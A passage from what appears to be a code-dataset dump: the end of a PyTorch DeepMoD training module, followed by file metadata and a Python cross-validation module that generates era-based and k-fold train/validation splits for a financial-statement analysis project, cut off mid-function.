_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_wscaled(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
with torch.no_grad():
w_Reg = 1 / torch.sum(MSE.data)
w_MSE = 1 - w_Reg
loss = torch.sum(w_MSE * MSE + w_Reg * Reg)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(w_MSE * MSE_test + w_Reg * Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test, w_MSE=w_MSE, w_Reg=w_Reg)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_bayes(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
v = torch.tensor(10.).to(data.device)
s0 = torch.tensor(1e-2).to(data.device)
n = n_train
v_MSE = v + n
s0_MSE = (v * s0 + torch.sum((target_train - prediction)**2)) / (v + n)
t = StudentT(v_MSE, loc=prediction, scale=s0_MSE)
loss = -torch.mean(t.log_prob(target_train))
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(MSE_test + Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_LL(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
s_MSE = MSE
s_Reg = (MSE * Reg) / (MSE + Reg)
loss = 1/s_MSE * MSE + 1/s_MSE * Reg + torch.log(s_MSE * s_MSE)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(MSE_test + Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
| 50.939292
| 272
| 0.590956
| 3,475
| 30,207
| 4.947914
| 0.052374
| 0.024194
| 0.042747
| 0.029313
| 0.912062
| 0.905141
| 0.898046
| 0.892695
| 0.892695
| 0.892695
| 0
| 0.012522
| 0.270302
| 30,207
| 593
| 273
| 50.939292
| 0.767535
| 0.199556
| 0
| 0.838798
| 0
| 0
| 0.025596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019126
| false
| 0
| 0.021858
| 0
| 0.040984
| 0.019126
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62fd5862c04a77ded048ffb3a3f2ab438c9a6254
| 32,645
|
py
|
Python
|
src/models/cross_validation.py
|
LeanderLXZ/intelligent-analysis-of-financial-statements
|
38bab5bea3c2f22f71020020c8325f6b6b014853
|
[
"Apache-2.0"
] | null | null | null |
src/models/cross_validation.py
|
LeanderLXZ/intelligent-analysis-of-financial-statements
|
38bab5bea3c2f22f71020020c8325f6b6b014853
|
[
"Apache-2.0"
] | null | null | null |
src/models/cross_validation.py
|
LeanderLXZ/intelligent-analysis-of-financial-statements
|
38bab5bea3c2f22f71020020c8325f6b6b014853
|
[
"Apache-2.0"
] | 1
|
2021-12-15T02:09:16.000Z
|
2021-12-15T02:09:16.000Z
|
import numpy as np
from math import ceil
from models import utils
from config import cfg
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.model_selection import RepeatedKFold
from sklearn.model_selection import GroupKFold
class CrossValidation(object):
"""
Cross Validation
"""
def __init__(self):
self.trained_cv = []
@staticmethod
def random_split(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None):
test_size = n_valid / n_era
valid_era = []
ss_train = StratifiedShuffleSplit(n_splits=n_cv, test_size=test_size, random_state=cv_seed)
cv_count = 0
for train_index, valid_index in ss_train.split(x, y):
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def sk_k_fold(x, y, w, n_splits=None, n_cv=None, cv_seed=None):
if cv_seed is not None:
np.random.seed(cv_seed)
if n_cv % n_splits != 0:
raise ValueError('n_cv must be an integer multiple of n_splits!')
n_repeats = int(n_cv / n_splits)
era_k_fold = RepeatedKFold(n_splits=n_splits, n_repeats=n_repeats, random_state=cv_seed)
cv_count = 0
for train_index, valid_index in era_k_fold.split(x, y):
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, x_valid, y_valid, w_valid
@staticmethod
def sk_group_k_fold(x, y, e, n_cv=None):
era_k_fold = GroupKFold(n_splits=n_cv)
cv_count = 0
for train_index, valid_index in era_k_fold.split(x, y, e):
# Training data
x_train = x[train_index]
y_train = y[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, x_valid, y_valid
@staticmethod
def sk_group_k_fold_with_weight(x, y, w, e, n_cv=None):
era_k_fold = GroupKFold(n_splits=n_cv)
cv_count = 0
for train_index, valid_index in era_k_fold.split(x, y, e):
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, x_valid, y_valid, w_valid
@staticmethod
def era_k_fold(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
n_traverse = n_era // n_valid
n_rest = n_era % n_valid
if n_rest != 0:
n_traverse += 1
if n_cv % n_traverse != 0:
raise ValueError
n_epoch = n_cv // n_traverse
trained_cv = []
cv_count = 0
for epoch in range(n_epoch):
if era_list is None:
era_list = range(0, n_era)
era_idx = [era_list]
if n_rest == 0:
for i in range(n_traverse):
# Choose eras that have not used
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
if set(valid_era) != set(era_idx[i]):
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_list, n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
# Generate era set for next choosing
if i != n_traverse - 1:
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
# Generate train-validation split index
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
# n_cv is not an integer multiple of n_valid
else:
for i in range(n_traverse):
if i != n_traverse - 1:
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
else:
era_idx_else = [t for t in list(era_list) if t not in era_idx[i]]
valid_era = era_idx[i] + list(np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def era_k_fold_split(e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
n_traverse = n_era // n_valid
n_rest = n_era % n_valid
if n_rest != 0:
n_traverse += 1
if n_cv % n_traverse != 0:
raise ValueError
n_epoch = n_cv // n_traverse
trained_cv = []
cv_count = 0
for epoch in range(n_epoch):
if era_list is None:
era_list = range(0, n_era)
era_idx = [era_list]
if n_rest == 0:
for i in range(n_traverse):
# Choose eras that have not used
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
if set(valid_era) != set(era_idx[i]):
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_list, n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
# Generate era set for next choosing
if i != n_traverse - 1:
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
# Generate train-validation split index
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield train_index, valid_index
# n_cv is not an integer multiple of n_valid
else:
for i in range(n_traverse):
if i != n_traverse - 1:
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield train_index, valid_index
else:
era_idx_else = [t for t in list(range(0, n_era)) if t not in era_idx[i]]
valid_era = era_idx[i] + list(np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield train_index, valid_index
def era_k_fold_for_stack(self, x, y, w, e, x_g, n_valid=None, n_cv=None,
n_era=None, cv_seed=None, return_train_index=False):
if cv_seed is not None:
np.random.seed(cv_seed)
n_traverse = n_era // n_valid
n_rest = n_era % n_valid
if n_rest != 0:
n_traverse += 1
if n_cv % n_traverse != 0:
raise ValueError
n_epoch = n_cv // n_traverse
cv_count = 0
for epoch in range(n_epoch):
era_idx = [list(range(0, n_era))]
if n_rest == 0:
for i in range(n_traverse):
# Choose eras that have not used
if self.trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in self.trained_cv):
print('This CV split has been chosen, choosing another one...')
if set(valid_era) != set(era_idx[i]):
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(range(0, n_era), n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
# Generate era set for next choosing
if i != n_traverse - 1:
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
# Generate train-validation split index
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
x_g_train = x_g[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
x_g_valid = x_g[valid_index]
self.trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
if return_train_index:
yield x_train, y_train, w_train, e_train, x_g_train, x_valid, \
y_valid, w_valid, e_valid, x_g_valid, train_index, valid_index, valid_era
else:
yield x_train, y_train, w_train, x_g_train, x_valid, \
y_valid, w_valid, x_g_valid, valid_index, valid_era
# n_cv is not an integer multiple of n_valid
else:
for i in range(n_traverse):
if i != n_traverse - 1:
if self.trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in self.trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
x_g_train = x_g[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
x_g_valid = x_g[valid_index]
self.trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
if return_train_index:
yield x_train, y_train, w_train, e_train, x_g_train, x_valid, \
y_valid, w_valid, e_valid, x_g_valid, train_index, valid_index, valid_era
else:
yield x_train, y_train, w_train, x_g_train, x_valid, \
y_valid, w_valid, x_g_valid, valid_index, valid_era
else:
era_idx_else = [t for t in list(range(0, n_era)) if t not in era_idx[i]]
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
while any(set(valid_era) == i_cv for i_cv in self.trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
x_g_train = x_g[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
x_g_valid = x_g[valid_index]
self.trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
if return_train_index:
yield x_train, y_train, w_train, e_train, x_g_train, x_valid, \
y_valid, w_valid, e_valid, x_g_valid, train_index, valid_index, valid_era
else:
yield x_train, y_train, w_train, x_g_train, x_valid, \
y_valid, w_valid, x_g_valid, valid_index, valid_era
@staticmethod
def era_k_fold_balance(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
trained_cv = []
for i in range(n_cv):
if era_list is None:
era_list = range(0, n_era)
valid_era = np.random.choice(era_list, n_valid, replace=False)
while utils.check_bad_cv(trained_cv, valid_era):
valid_era = np.random.choice(era_list, n_valid, replace=False)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def era_k_fold_all_random(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
trained_cv = []
for i in range(n_cv):
if era_list is None:
era_list = range(0, n_era)
valid_era = np.random.choice(era_list, n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_list, n_valid, replace=False)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def era_k_fold_split_all_random(e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
trained_cv = []
for i in range(n_cv):
if era_list is None:
era_list = range(0, n_era)
valid_era = np.random.choice(era_list, n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_list, n_valid, replace=False)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
utils.print_cv_info(i+1, n_cv)
yield train_index, valid_index
@staticmethod
def forward_increase(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, valid_rate=None):
if cv_seed is not None:
np.random.seed(cv_seed)
# If valid_rate is provided, dynamically calculate n_valid
if valid_rate is not None:
n_valid_last = ceil(n_era*valid_rate)
else:
n_valid_last = n_valid
step = (n_era-n_valid_last)//n_cv
for i in range(n_cv):
valid_start = (i+1) * step
# If valid_rate is provided, dynamically calculate n_valid
if valid_rate is not None:
n_valid = ceil((valid_start*valid_rate)/(1-valid_rate))
if i == (n_cv - 1):
valid_stop = n_era
else:
valid_stop = valid_start + n_valid
print('======================================================')
print('Train Era: {}-{}'.format(0, valid_start-1))
print('Valid Era: {}-{}'.format(valid_start, valid_stop-1))
train_era = range(0, valid_start)
valid_era = list(range(valid_start, valid_stop))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in train_era:
train_index.append(ii)
elif ele in valid_era:
valid_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def forward_window(x, y, w, e, n_valid=None, n_cv=None, n_era=None,
window_size=None, cv_seed=None, valid_rate=None, ensemble=False):
if cv_seed is not None:
np.random.seed(cv_seed)
if ensemble:
x_valid = utils.load_preprocessed_data(cfg.preprocessed_data_path)[4]
y_valid, w_valid, e_valid = utils.load_preprocessed_test_data(cfg.preprocessed_data_path)
else:
x_valid, y_valid, w_valid, e_valid = None, None, None, None
n_step = (n_era-window_size) // n_cv
if valid_rate is not None:
n_valid = ceil(window_size*valid_rate)
train_start = 0
for i in range(n_cv):
if ensemble:
if i == (n_cv - 1):
train_start = n_era - window_size
train_end = n_era
else:
train_end = train_start + window_size
print('======================================================')
print('Train Era: {}-{}'.format(train_start, train_end - 1))
train_era = list(range(train_start, train_end))
valid_era = list(set(e_valid))
train_index = []
for ii, ele in enumerate(e):
if ele in train_era:
train_index.append(ii)
np.random.shuffle(train_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
train_start += n_step
utils.print_cv_info(i + 1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
else:
if i == (n_cv - 1):
